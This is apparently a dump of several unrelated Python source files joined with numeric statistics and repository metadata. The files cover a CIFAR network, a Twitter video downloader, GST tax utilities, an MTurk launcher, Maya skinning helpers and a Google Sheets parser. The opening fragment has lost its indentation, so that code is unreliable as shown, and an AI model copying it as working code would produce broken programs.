# self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
# self.bn1 = nn.BatchNorm2d(32)
global THRESHOLD
THRESHOLD = threshold
print('threshold is set to {}'.format(threshold))
self.conv1 = conv3x3(3, 32, stride=1)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32)
# self.conv2 = nn.Conv2d(320, 1280, kernel_size=1, stride=1, padding=0, bias=False)
# self.bn2 = nn.BatchNorm2d(1280)
self.conv2 = conv1x1(320, 1280, stride=1)
self.bn2 = nn.BatchNorm2d(1280)
# self.linear = nn.Linear(1280, num_classes)
self.linear = SELinear(1280, num_classes, threshold=THRESHOLD)
def _make_layers(self, in_planes):
layers = []
for expansion, out_planes, num_blocks, stride in self.cfg:
strides = [stride] + [1]*(num_blocks-1)
for stride in strides:
layers.append(Block(in_planes, out_planes, expansion, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x, return_linear_input=False):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.relu(self.bn2(self.conv2(out)))
# NOTE: change pooling kernel_size 7 -> 4 for CIFAR10
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
if return_linear_input:
linear_input = out
out = self.linear(out)
if return_linear_input:
return out, linear_input
else:
return out
def test():
    net = SEMaskMobileNetV2()
    for m in net.modules():
        if hasattr(m, 'mask'):
            print(m.C.numel())
    x = torch.randn(2, 3, 32, 32)
    y = net(x)
    print(y.size())
# test()
if __name__ == "__main__":
test()
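A quick shape check on CIFAR-sized input (batch size is arbitrary): the three stride-2 stages in cfg reduce the 32x32 input to 4x4, which the 4x4 average pool collapses into the 1280-dim linear input.
net = SEMaskMobileNetV2(num_classes=10, threshold=4e-3)
x = torch.randn(8, 3, 32, 32)
logits, feats = net(x, return_linear_input=True)
print(logits.shape, feats.shape)  # torch.Size([8, 10]) torch.Size([8, 1280])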
| 36.451852
| 116
| 0.613696
| 661
| 4,921
| 4.426626
| 0.192133
| 0.058442
| 0.07177
| 0.06972
| 0.427204
| 0.405673
| 0.29255
| 0.203691
| 0.176692
| 0.103896
| 0
| 0.060473
| 0.260719
| 4,921
| 134
| 117
| 36.723881
| 0.743815
| 0.268441
| 0
| 0.091954
| 0
| 0
| 0.01433
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091954
| false
| 0.011494
| 0.045977
| 0
| 0.241379
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2f3eb592211892766f130ad1032ee5dd774617
| 911
|
py
|
Python
|
twitter_video.py
|
keselekpermen69/build_scripts
|
110392778ad0a8585efa944100aa1c13ef28469e
|
[
"MIT"
] | 5
|
2020-08-19T05:44:25.000Z
|
2021-05-13T05:15:50.000Z
|
twitter_video.py
|
MrMissx/scripts
|
110392778ad0a8585efa944100aa1c13ef28469e
|
[
"MIT"
] | null | null | null |
twitter_video.py
|
MrMissx/scripts
|
110392778ad0a8585efa944100aa1c13ef28469e
|
[
"MIT"
] | null | null | null |
import requests
def get_link():
return input("Give me a twitter video link: ")
def download(url: str):
    name = url.rsplit('/')[-1]
    if "?tag" in name:
        name = name.split('?')[0]
    r = requests.get(url, allow_redirects=True)
    with open(name, 'wb') as f:  # close the file handle deterministically
        f.write(r.content)
def main():
payload = {'url': get_link()}
response = requests.request("POST",
"http://sosmeeed.herokuapp.com:80/api/twitter/video",
data=payload)
if response.status_code != 200:
print("Can't fetch video!")
return
res = response.json()
if not res["success"]:
print("Error! Please input correct URL")
return
url = res["data"]["data"][0]["link"] # use the highest quality
print(f"Downloading ({url})...")
download(url)
if __name__ == "__main__":
main()
| 24.621622
| 86
| 0.531284
| 107
| 911
| 4.411215
| 0.588785
| 0.029661
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012759
| 0.311745
| 911
| 37
| 87
| 24.621622
| 0.740032
| 0.025247
| 0
| 0.076923
| 0
| 0
| 0.227059
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115385
| false
| 0
| 0.038462
| 0.038462
| 0.269231
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb2fabace401a8d0a972f811af8b0a86ed348c85
| 2,951
|
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/regional/india/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/india/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/regional/india/utils.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
import frappe, re
from frappe import _
from frappe.utils import cstr
from erpnext.regional.india import states, state_numbers
from erpnext.controllers.taxes_and_totals import get_itemised_tax, get_itemised_taxable_amount
def validate_gstin_for_india(doc, method):
if not hasattr(doc, 'gstin'):
return
if doc.gstin:
doc.gstin = doc.gstin.upper()
if doc.gstin != "NA":
p = re.compile("[0-9]{2}[a-zA-Z]{5}[0-9]{4}[a-zA-Z]{1}[1-9A-Za-z]{1}[Z]{1}[0-9a-zA-Z]{1}")
if not p.match(doc.gstin):
frappe.throw(_("Invalid GSTIN or Enter NA for Unregistered"))
if not doc.gst_state:
if doc.state in states:
doc.gst_state = doc.state
if doc.gst_state:
doc.gst_state_number = state_numbers[doc.gst_state]
if doc.gstin and doc.gstin != "NA" and doc.gst_state_number != doc.gstin[:2]:
frappe.throw(_("First 2 digits of GSTIN should match with State number {0}")
.format(doc.gst_state_number))
def get_itemised_tax_breakup_header(item_doctype, tax_accounts):
if frappe.get_meta(item_doctype).has_field('gst_hsn_code'):
return [_("HSN/SAC"), _("Taxable Amount")] + tax_accounts
else:
return [_("Item"), _("Taxable Amount")] + tax_accounts
def get_itemised_tax_breakup_data(doc):
itemised_tax = get_itemised_tax(doc.taxes)
itemised_taxable_amount = get_itemised_taxable_amount(doc.items)
if not frappe.get_meta(doc.doctype + " Item").has_field('gst_hsn_code'):
return itemised_tax, itemised_taxable_amount
item_hsn_map = frappe._dict()
for d in doc.items:
item_hsn_map.setdefault(d.item_code or d.item_name, d.get("gst_hsn_code"))
hsn_tax = {}
for item, taxes in itemised_tax.items():
hsn_code = item_hsn_map.get(item)
hsn_tax.setdefault(hsn_code, frappe._dict())
for tax_account, tax_detail in taxes.items():
hsn_tax[hsn_code].setdefault(tax_account, {"tax_rate": 0, "tax_amount": 0})
hsn_tax[hsn_code][tax_account]["tax_rate"] = tax_detail.get("tax_rate")
hsn_tax[hsn_code][tax_account]["tax_amount"] += tax_detail.get("tax_amount")
# set taxable amount
hsn_taxable_amount = frappe._dict()
for item, taxable_amount in itemised_taxable_amount.items():
hsn_code = item_hsn_map.get(item)
hsn_taxable_amount.setdefault(hsn_code, 0)
hsn_taxable_amount[hsn_code] += itemised_taxable_amount.get(item)
return hsn_tax, hsn_taxable_amount
def set_place_of_supply(doc, method):
if not frappe.get_meta('Address').has_field('gst_state'): return
if doc.doctype in ("Sales Invoice", "Delivery Note"):
address_name = doc.shipping_address_name or doc.customer_address
elif doc.doctype == "Purchase Invoice":
address_name = doc.shipping_address or doc.supplier_address
if address_name:
address = frappe.db.get_value("Address", address_name, ["gst_state", "gst_state_number"], as_dict=1)
doc.place_of_supply = cstr(address.gst_state_number) + "-" + cstr(address.gst_state)
# don't remove this function it is used in tests
def test_method():
'''test function'''
return 'overridden'
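A quick check of the GSTIN pattern above; the number is made up but syntactically valid (two-digit state code, PAN-like core, entity code, the literal 'Z', checksum character):
import re
p = re.compile("[0-9]{2}[a-zA-Z]{5}[0-9]{4}[a-zA-Z]{1}[1-9A-Za-z]{1}[Z]{1}[0-9a-zA-Z]{1}")
print(bool(p.match("27AAPFU0939F1ZV")))  # True
print(bool(p.match("NA")))               # False: unregistered parties enter NA and skip the regex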
| 36.8875
| 102
| 0.74856
| 482
| 2,951
| 4.286307
| 0.226141
| 0.088093
| 0.03727
| 0.024685
| 0.163601
| 0.07938
| 0.056147
| 0.030978
| 0.030978
| 0
| 0
| 0.008475
| 0.120298
| 2,951
| 79
| 103
| 37.35443
| 0.787365
| 0.027109
| 0
| 0.033333
| 0
| 0.016667
| 0.145251
| 0.02514
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb336072c83fb710a31348edb291a0b22c416bc1
| 706
|
py
|
Python
|
ProgsByDataset/UnpaywallMAG/create_unpaywall_refs.py
|
ashwath92/MastersThesis
|
f74755dc0c32f316da3c860dd5dbfa4c9cad97b3
|
[
"MIT"
] | 5
|
2020-11-05T07:11:54.000Z
|
2021-08-04T21:37:28.000Z
|
ProgsByDataset/UnpaywallMAG/create_unpaywall_refs.py
|
ashwath92/MastersThesis
|
f74755dc0c32f316da3c860dd5dbfa4c9cad97b3
|
[
"MIT"
] | null | null | null |
ProgsByDataset/UnpaywallMAG/create_unpaywall_refs.py
|
ashwath92/MastersThesis
|
f74755dc0c32f316da3c860dd5dbfa4c9cad97b3
|
[
"MIT"
] | 4
|
2020-11-05T06:04:38.000Z
|
2021-08-02T16:25:42.000Z
|
import re
import csv
# Unpaywall citing, cited list based on mag ids
unpaywall_citing_cited_file = open('AdditionalOutputs/unpaywallmag_references.tsv', 'w')
fieldnames = ['citing_mag_id', 'cited_mag_id']
writer = csv.DictWriter(unpaywall_citing_cited_file, delimiter="\t", fieldnames=fieldnames)
citation_pattern = re.compile(r'(=-=)([0-9]+)(-=-)')
with open('inputfiles/training_no20182019_with_contexts.txt', 'r') as file:
for line in file:
citing_paperid = line.split()[0]
for citation_marker in citation_pattern.finditer(line):
fetched_mag_id = citation_marker.group(2)
writer.writerow({'citing_mag_id': citing_paperid,'cited_mag_id': fetched_mag_id})
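A quick sketch of the citation-marker pattern; the input line is made up but follows the =-=<mag_id>-=- convention the regex expects:
line = "123 some citing context =-=456-=- and more =-=789-=-"
for marker in citation_pattern.finditer(line):
    print(marker.group(2))  # prints 456, then 789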
| 39.222222
| 93
| 0.730878
| 95
| 706
| 5.136842
| 0.505263
| 0.061475
| 0.122951
| 0.098361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019802
| 0.141643
| 706
| 17
| 94
| 41.529412
| 0.785479
| 0.063739
| 0
| 0
| 0
| 0
| 0.251142
| 0.141553
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb336c9971fca1cc78e0225c7dbfc79890eb6bc4
| 721
|
py
|
Python
|
Configuration/Skimming/python/PA_MinBiasSkim_cff.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | null | null | null |
Configuration/Skimming/python/PA_MinBiasSkim_cff.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | null | null | null |
Configuration/Skimming/python/PA_MinBiasSkim_cff.py
|
nistefan/cmssw
|
ea13af97f7f2117a4f590a5e654e06ecd9825a5b
|
[
"Apache-2.0"
] | null | null | null |
import FWCore.ParameterSet.Config as cms
# HLT minimum bias trigger
import HLTrigger.HLTfilters.hltHighLevel_cfi
hltMinBiasHI = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()
hltMinBiasHI.HLTPaths = ["HLT_PAL1MinimumBiasHF_OR_SinglePixelTrack_ForSkim_v*"]
hltMinBiasHI.throw = False
hltMinBiasHI.andOr = True
# selection of valid vertex
primaryVertexFilterForMinBias = cms.EDFilter("VertexSelector",
src = cms.InputTag("offlinePrimaryVertices"),
cut = cms.string("!isFake && abs(z) <= 25 && position.Rho <= 2"),
filter = cms.bool(True), # otherwise it won't filter the events
)
# MinBias skim sequence
minBiasSkimSequence = cms.Sequence(
hltMinBiasHI *
primaryVertexFilterForMinBias
)
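A minimal sketch of wiring the sequence into a skim path inside a cmsRun configuration; the process object and path name are assumptions, not part of this file:
# hypothetical: in the skim's cmsRun config, with `process` a cms.Process
process.minBiasSkimPath = cms.Path(minBiasSkimSequence)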
| 32.772727
| 80
| 0.769764
| 76
| 721
| 7.210526
| 0.736842
| 0.069343
| 0.113139
| 0.124088
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0064
| 0.133148
| 721
| 21
| 81
| 34.333333
| 0.8704
| 0.142857
| 0
| 0
| 0
| 0
| 0.215334
| 0.120718
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb360bb15c3aa59399389bed8b1e64bb7c548a75
| 3,696
|
py
|
Python
|
launch_hits.py
|
hinthornw/Pointing
|
e3cbaf2c5f54d20fe959406714b38634bc4bb3fe
|
[
"MIT"
] | null | null | null |
launch_hits.py
|
hinthornw/Pointing
|
e3cbaf2c5f54d20fe959406714b38634bc4bb3fe
|
[
"MIT"
] | null | null | null |
launch_hits.py
|
hinthornw/Pointing
|
e3cbaf2c5f54d20fe959406714b38634bc4bb3fe
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import json
from boto.mturk.price import Price
from boto.mturk.question import HTMLQuestion
from boto.mturk.connection import MTurkRequestError
import os
import simpleamt
import sys
import inspect
def printPlus(*args):
print(inspect.getouterframes(inspect.currentframe())[1][2], ": ", args)
DEBUG = printPlus
# Motorbike 20-40
# Dog 40-70
# Person 40-70
MINHITS = 40
MAXHITS = 60
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[simpleamt.get_parent_parser()])
parser.add_argument('--hit_properties_file', type=argparse.FileType('r'))
parser.add_argument('--html_template')
parser.add_argument('--input_json_file', type=argparse.FileType('r'))
parser.add_argument('--input_cache', type=argparse.FileType('r'))
args = parser.parse_args()
im_names = []
if args.input_cache is not None:
#DEBUG("Cache: {}".format(args.input_cache))
for i, line in enumerate(args.input_cache):
im_names.append(json.loads(line.strip()))
#im_names = json.load(args.input_cache)
input_json_file = []
for i, line in enumerate(args.input_json_file):
input_json_file.append(line)
mtc = simpleamt.get_mturk_connection_from_args(args)
hit_properties = json.load(args.hit_properties_file)
hit_properties['reward'] = Price(hit_properties['reward'])
#hit_properties['Reward'] = str(hit_properties['Reward']).decode('utf-8')
simpleamt.setup_qualifications(hit_properties, mtc)
#DEBUG("After", hit_properties)
frame_height = hit_properties.pop('frame_height')
env = simpleamt.get_jinja_env(args.config)
template = env.get_template(args.html_template)
if args.hit_ids_file is None:
DEBUG('Need to input a hit_ids_file')
sys.exit()
DEBUG(args.hit_ids_file, args.input_cache)
if os.path.isfile(args.hit_ids_file):
DEBUG('hit_ids_file already exists')
sys.exit()
with open(args.hit_ids_file, 'w') as hit_ids_file:
# for i, line in enumerate(args.input_json_file):
print("Launching {} HITS".format(len(input_json_file)))
for i, line in enumerate(input_json_file):
if i < MINHITS:
continue
hit_input = json.loads(line.strip())
# In a previous version I removed all single quotes from the json dump.
# TODO: double check to see if this is still necessary.
template_params = {'input': json.dumps(hit_input)}
if len(im_names) > 0:
template_params['im_names'] = json.dumps(
im_names[i]) # json.dumps(im_names)
html = template.render(template_params)
html_question = HTMLQuestion(html, frame_height)
hit_properties['question'] = html_question
#DEBUG('Rendering Template {}'.format(i))
# with open('rendered_template{}.html'.format(i), 'w+') as f:
# f.write(html)
# This error handling is kinda hacky.
# TODO: Do something better here.
launched = False
while not launched:
try:
boto_hit = mtc.create_hit(**hit_properties)
launched = True
except MTurkRequestError as e:
DEBUG(e)
hit_id = boto_hit[0].HITId
hit_ids_file.write('%s\n' % hit_id)
DEBUG('Launched HIT ID: %s, %d' % (hit_id, i + 1))
if i > MAXHITS:
DEBUG(
"Debugging mode ON. Limiting HIT number to {}".format(
MAXHITS - MINHITS))
break
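# Hypothetical command line for this script (file names are illustrative;
# --hit_ids_file is assumed to come from simpleamt.get_parent_parser()):
# python launch_hits.py --hit_properties_file hit_properties.json \
#     --html_template pointing.html --input_json_file inputs.json \
#     --hit_ids_file hit_ids.txt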
| 36.594059
| 83
| 0.628247
| 468
| 3,696
| 4.739316
| 0.326923
| 0.070334
| 0.036069
| 0.018034
| 0.10505
| 0.10505
| 0.10505
| 0.092426
| 0.036069
| 0.036069
| 0
| 0.00805
| 0.260552
| 3,696
| 100
| 84
| 36.96
| 0.803513
| 0.161526
| 0
| 0.028169
| 0
| 0
| 0.086957
| 0.006814
| 0
| 0
| 0
| 0.01
| 0
| 1
| 0.014085
| false
| 0
| 0.140845
| 0
| 0.15493
| 0.070423
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb36ee81af365dbd4ec4f2c01bf63d11e510fd29
| 2,405
|
py
|
Python
|
scripts/skinning/utils/skin.py
|
robertjoosten/skinning-tools
|
1f1ec6c092fdc1e39aa82a711a13a0041f9d5730
|
[
"MIT"
] | 31
|
2018-09-08T16:42:01.000Z
|
2022-03-31T12:31:21.000Z
|
scripts/skinning/utils/skin.py
|
robertjoosten/skinning-tools
|
1f1ec6c092fdc1e39aa82a711a13a0041f9d5730
|
[
"MIT"
] | null | null | null |
scripts/skinning/utils/skin.py
|
robertjoosten/skinning-tools
|
1f1ec6c092fdc1e39aa82a711a13a0041f9d5730
|
[
"MIT"
] | 11
|
2018-10-01T09:57:53.000Z
|
2022-03-19T06:53:02.000Z
|
from maya import cmds
from maya.api import OpenMaya
from maya.api import OpenMayaAnim
from functools import partial
from skinning.utils import api
from skinning.vendor import apiundo
def get_cluster_fn(node):
"""
Loop over an object's history and return the skin cluster API node that
is part of the dependency graph. The geometry provided will be extended to its
shapes.
:param str node:
:return: Skin cluster
:rtype: OpenMayaAnim.MFnSkinCluster
:raise RuntimeError: When no skin cluster can be found.
"""
shapes = cmds.listRelatives(node, shapes=True) or []
shapes.append(node)
for shape in shapes:
shape_obj = api.conversion.get_object(shape)
dependency_iterator = OpenMaya.MItDependencyGraph(
shape_obj,
OpenMaya.MFn.kSkinClusterFilter,
OpenMaya.MItDependencyGraph.kUpstream
)
while not dependency_iterator.isDone():
return OpenMayaAnim.MFnSkinCluster(dependency_iterator.currentNode())
else:
raise RuntimeError("Node '{}' has no skin cluster in its history.".format(node))
def get_cluster(node):
"""
Loop over an object's history and return the skin cluster node that is part
of the history. The geometry provided will be extended to its shapes.
:param str node:
:return: Skin cluster
:rtype: str
"""
skin_cluster_fn = get_cluster_fn(node)
return skin_cluster_fn.name()
# ----------------------------------------------------------------------------
def set_weights(skin_cluster, dag, components, influences, weights_new, weights_old=None):
"""
Set the skin weights via the API but add them to the undo queue using the
apiundo module. If weights old are not provided they are retrieved from
the skin cluster first.
:param OpenMayaAnim.MFnSkinCluster skin_cluster:
:param OpenMaya.MDagPath dag:
:param OpenMaya.MObject components:
:param OpenMaya.MIntArray influences:
:param OpenMaya.MDoubleArray weights_new:
:param OpenMaya.MDoubleArray weights_old:
"""
if weights_old is None:
weights_old, _ = skin_cluster.getWeights(dag, components)
undo = partial(skin_cluster.setWeights, dag, components, influences, weights_old)
redo = partial(skin_cluster.setWeights, dag, components, influences, weights_new)
apiundo.commit(undo=undo, redo=redo)
redo()
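# Hypothetical usage inside a running Maya session (the mesh name "body_geo"
# is illustrative only):
# skin_cluster_fn = get_cluster_fn("body_geo")   # OpenMayaAnim.MFnSkinCluster
# print(get_cluster("body_geo"))                 # e.g. "skinCluster1"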
| 32.066667
| 90
| 0.69106
| 295
| 2,405
| 5.532203
| 0.349153
| 0.094363
| 0.025735
| 0.038603
| 0.251225
| 0.229167
| 0.229167
| 0.229167
| 0.158088
| 0.158088
| 0
| 0
| 0.208732
| 2,405
| 74
| 91
| 32.5
| 0.857593
| 0.401247
| 0
| 0
| 0
| 0
| 0.034039
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.2
| 0
| 0.366667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb3817bdbf09d70c073184d064ea74bede74d6b3
| 1,607
|
py
|
Python
|
z_exams/exam_2018_08_26/ex_03_descriptions.py
|
VasAtanasov/SoftUni-Python-Fundamentals
|
471d0537dd6e5c8b61ede92b7673c0d67e2964fd
|
[
"MIT"
] | 1
|
2019-06-05T11:16:08.000Z
|
2019-06-05T11:16:08.000Z
|
z_exams/exam_2018_08_26/ex_03_descriptions.py
|
VasAtanasov/SoftUni-Python-Fundamentals
|
471d0537dd6e5c8b61ede92b7673c0d67e2964fd
|
[
"MIT"
] | null | null | null |
z_exams/exam_2018_08_26/ex_03_descriptions.py
|
VasAtanasov/SoftUni-Python-Fundamentals
|
471d0537dd6e5c8b61ede92b7673c0d67e2964fd
|
[
"MIT"
] | null | null | null |
import re
REGEX = {
"name": r"name is (?P<name>[A-Z][A-Za-z]+ [A-Z][A-Za-z]+)",
"age": r" (?P<age>[0-9]{2}) years",
"date": r"on (?P<date>[0-9]{2}-[0-9]{2}-[0-9]{4})."
}
class Person:
def __init__(self, full_name, age, birth_date):
self.__full_name = full_name
self.__age = age
self.__birth_date = birth_date
@property
def full_name(self):
return self.__full_name
@property
def age(self):
return self.__age
@property
def birth_date(self):
return self.__birth_date
def __str__(self):
return f"Name of the person: {self.full_name}.\n" \
f"Age of the person: {self.age}.\n" \
f"Birthdate of the person: {self.birth_date}."
db = []
while True:
line = input()
if "make migrations" == line:
break
if not line.endswith('.'):
continue
params = {}
for requirement, regex in REGEX.items():
match = re.search(regex, line)
if not match:
params = {}
break
if requirement == "age":
age = int(match.group(requirement))
if age <= 9 or age >= 100:
break
params["age"] = age
elif requirement == "name":
params["name"] = match.group(requirement)
elif requirement == "date":
params["date"] = match.group(requirement)
if params:
db.append(Person(full_name=params["name"], age=params["age"], birth_date=params["date"]))
if not db:
print("DB is empty")
else:
print("\n".join(map(str, db)))
| 23.289855
| 97
| 0.533914
| 215
| 1,607
| 3.832558
| 0.297674
| 0.067961
| 0.058252
| 0.054612
| 0.024272
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015247
| 0.306161
| 1,607
| 68
| 98
| 23.632353
| 0.723767
| 0
| 0
| 0.153846
| 0
| 0.038462
| 0.185439
| 0.037337
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096154
| false
| 0
| 0.019231
| 0.076923
| 0.211538
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb3a72f79061cb96a4d85d2974153bcda4983c49
| 7,667
|
py
|
Python
|
GoogleSheetsJobParser.py
|
mattfromsydney/Scientific-Report-Generator
|
17ddfe42e38d83341460a6de7b0b156bf7cd820a
|
[
"MIT"
] | null | null | null |
GoogleSheetsJobParser.py
|
mattfromsydney/Scientific-Report-Generator
|
17ddfe42e38d83341460a6de7b0b156bf7cd820a
|
[
"MIT"
] | null | null | null |
GoogleSheetsJobParser.py
|
mattfromsydney/Scientific-Report-Generator
|
17ddfe42e38d83341460a6de7b0b156bf7cd820a
|
[
"MIT"
] | null | null | null |
"""
NOTE on google sheets format:
The google sheets document must have the following:
Columns A and B from cell 2 down are all the sample details
Column A is the name of the detail and Column B is the value of the detail
Columns B and onwards can be anything, but there must be three specific columns:
Replicate, Test Name, Result
Each row in these columns is counted as a test result and are grouped together
by test name, replicate
All rows must have a unique TestName-Replicate combination or an error is shown
"""
from SampleData import SampleData
from SRGJob import SRGJob
import time
class GoogleSheetsJobParser:
""" Opens a google sheets document and parses the contents into a job class """
def __init__(self, view):
self.view = view
pass
def parse_document(self, service, document_id):
""" The main function that opens the document, parses the data into a jobs
object and returns the resulting job with all the calculated values
Args:
service (google sheets service): the google sheets api service
document_id (str): the google sheets document id to fetch and process
Returns:
job (SRGJob): the job object containing all the job information
and calculated results from the data
"""
# Call the Sheets API to get a reference to the sheet
sheet_ref = service.spreadsheets().get(spreadsheetId=document_id)
#get the sheet details such as individual sheet names, each test sample
#will be on a separate sheet
sheet_details = sheet_ref.execute()
#The job object will hold the list of samples and their data
job = SRGJob()
#go through each sheet in the spreadsheets and process into a SampleData object
for sheet in sheet_details.get('sheets'):
title = sheet.get('properties').get('title')
self.view.display_message("Processing: {}".format(title))
#special Details tab is used to extract the details required for the report
if title == "Details":
self.parse_details(sheet, job, service, document_id)
else:
self.parse_sample(sheet, job, service, document_id)
#slow down the requests so as to not breach the 'x requests in 100 seconds' rate limit
time.sleep(10)
#return None if no samples were added to this job
if len(job.samples) > 0:
return job
else:
return None
def parse_details(self, sheet, job, service, document_id):
""" Parses the details tab which has information about the report
Args:
sheet (google sheet): The google sheet to process
job (SRGJob): the pointer to the job object to hold all the results
service (google sheets service): the google sheets api service
document_id (str): the google sheets document id to fetch and process
"""
#get the first row with all the column headings as well as the first two
#columns which contain the sample details
result = service.spreadsheets().values().get(spreadsheetId=document_id,
range='Details!A2:B101').execute()
#fields columns, first column is name of field and second
#column is the value for the field
values = result.get('values', [])
for row in values:
if len(row) == 2 and row[0] != '':
job.fields[row[0]] = row[1]
def parse_sample(self, sheet, job, service, document_id):
""" Parses each tab in the sheet as a separate sample.
Args:
sheet (google sheet): The google sheet to process
job (SRGJob): the pointer to the job object to hold all the results
service (google sheets service): the google sheets api service
document_id (str): the google sheets document id to fetch and process
"""
#get the title of the sheet to be used for the ranges reference in batchGet()
title = sheet.get('properties').get('title')
#rowCount is taken here so we know how many rows to extract from the sheet
row_count = sheet.get('properties').get('gridProperties').get('rowCount')
#get the first row with all the column headings as well as the first two
#columns which contain the sample details
result = service.spreadsheets().values().batchGet(spreadsheetId=document_id,
ranges=['{0}!A2:B101'.format(title),
'{0}!A1:Z1'.format(title)]).execute()
#The first element in this array is the sample details columns
#the second element is the column names ie. first row of sheet
valueRanges = result.get('valueRanges', [])
#create a sample data object to store all the extracted data
sample_data = SampleData()
#Sample details columns, first column is name of detail and second
#column is the value for the detail
values = valueRanges[0].get('values', [])
for row in values:
if len(row) == 2 and row[0] != '':
sample_data.add_detail(row[0], row[1])
#names of all the columns in the spreadsheet. Need to get the index
#of the Test Name and Result columns, these are the data columns that
#need to be extracted from the sheet
values = valueRanges[1].get('values', [])
try:
tn_col_index = values[0].index("Test Name")
res_col_index = values[0].index("Result")
except ValueError:
#don't add this sample because the required columns did not exist
return
#convert the index of these columns to the column letter, columns
#are letters in spreadsheets not numbers
alpha_codes = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
tn_code = alpha_codes[tn_col_index]
res_code = alpha_codes[res_col_index]
#make another request to the sheets api to get the test result data
#from the Test Name and Result columns found above
data_result = service.spreadsheets().values().batchGet(spreadsheetId=document_id,
ranges=['{0}!{1}2:{1}{2}'.format(title, tn_code, row_count),
'{0}!{1}2:{1}{2}'.format(title, res_code, row_count)]).execute()
#The first element in data_values will be the Test Name column array
#the second element will be the Result column array
data_values = data_result.get('valueRanges', [])
tn_data = data_values[0].get('values', [])
res_data = data_values[1].get('values', [])
#go through each row in the extracted data and get the value for
#Test Name and Result
for i in range(len(tn_data)):
#Add the Result for this Test Name to the sample_data test result array
if len(tn_data[i]) > 0 and len(res_data[i]) > 0:
sample_data.add_result(tn_data[i][0], res_data[i][0])
#if this sample had some useable data then add it to the job object
if len(sample_data.details) > 0 and len(sample_data.test_results) > 0:
job.add_sample(sample_data)
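# Hypothetical wiring for this parser (assumes google-api-python-client and
# already-obtained credentials; `view` and `creds` are illustrative names):
# from googleapiclient.discovery import build
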